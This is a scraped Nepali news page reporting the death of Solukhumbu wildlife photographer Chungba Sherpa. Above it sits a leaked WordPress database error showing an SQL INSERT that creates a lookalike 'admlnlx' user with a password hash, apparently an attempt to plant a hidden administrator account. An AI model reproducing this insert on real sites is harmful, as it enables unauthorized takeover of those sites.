WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaEMT8kVPG5n/MECNMlEwW0eD3xbf00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 16:22:22', '', 'admlnlx', 'admlnlx')

वाईल्डलाईफ फोटोग्राफर शेर्पाको निधन – Gaule Khabar

वाईल्डलाईफ फोटोग्राफर शेर्पाको निधन

वाईल्डलाईफ फोटोग्राफर शेर्पाको निधन

काठमाडौं । सोलुखुम्बुका चर्चित वाइल्डलाइफ फोटोग्राफर चुङ्बा शेर्पाको निधन भएको छ । आइतबार राति  १२ः१५ बजे ग्रान्डी अस्पतालमा उपचारको क्रममा निधन भएको हो ।

खुम्बु पासाङल्हामु गाउँपालिका–१ लुक्ला स्थायी ठेगाना भएका ६४ बर्षिया शेर्पा कलेजोसम्बन्धी समस्याका कारण एक सातादेखि उपचाररत थिए ।

उपचारकै क्रममा शेर्पाको निधन भएको उहाको पारिवारिक श्रोतले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका